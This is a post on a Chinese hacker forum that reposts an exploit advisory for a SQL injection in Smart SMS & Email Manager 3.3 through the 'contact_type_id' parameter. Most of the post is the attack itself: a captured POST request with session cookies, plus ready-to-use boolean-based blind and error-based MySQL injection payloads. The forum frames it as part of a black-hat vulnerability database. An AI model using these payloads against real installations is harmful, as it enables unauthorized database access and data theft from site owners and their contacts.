跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Smart SMS & Email Manager v3.3 - SQL Injection
# Google Dork: N/A
# Date: 17.07.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/smart-sms-email-manager-ssem/14817919
# Version: 3.3
# Tested on: Kali linux
====================================================
The vulnerability allows an attacker to inject sql commands
from the search section with 'contact_type_id' parameter in the admin panel.


# PoC : SQLi :

http://site.net/phonebook/contact_list_data

POST /phonebook/contact_list_data HTTP/1.1
Host: site.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.net/phonebook/contact_list
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Cookie:
ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d61b9083afe2435321ba518449f3b108%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22213.14.165.138%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A52.0%29+Gecko%2F20100101+Firefox%2F52.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1531824069%3B%7Dce4c26e8ee366999ae805f61eba75b1a;
xerone_dolphin=6811071531824070937
Connection: keep-alive
first_name=Test&last_name=test&phone_number=5555555&email=test%40test.com
&dob=07%2F04%2F2018&contact_type_id=280&is_searched=1&page=1&rows=10


Parameter: contact_type_id (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
    Payload: client_username=tes&contact_type_id=142' RLIKE (SELECT (CASE
WHEN (5715=5715) THEN 142 ELSE 0x28 END)) AND 'Jeop' LIKE
'Jeop&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
    Payload: client_username=tes&contact_type_id=142' AND
EXTRACTVALUE(4506,CONCAT(0x5c,0x7176716271,(SELECT
(ELT(4506=4506,1))),0x7171707071)) AND 'vZFG' LIKE
'vZFG&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20

====================================================

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。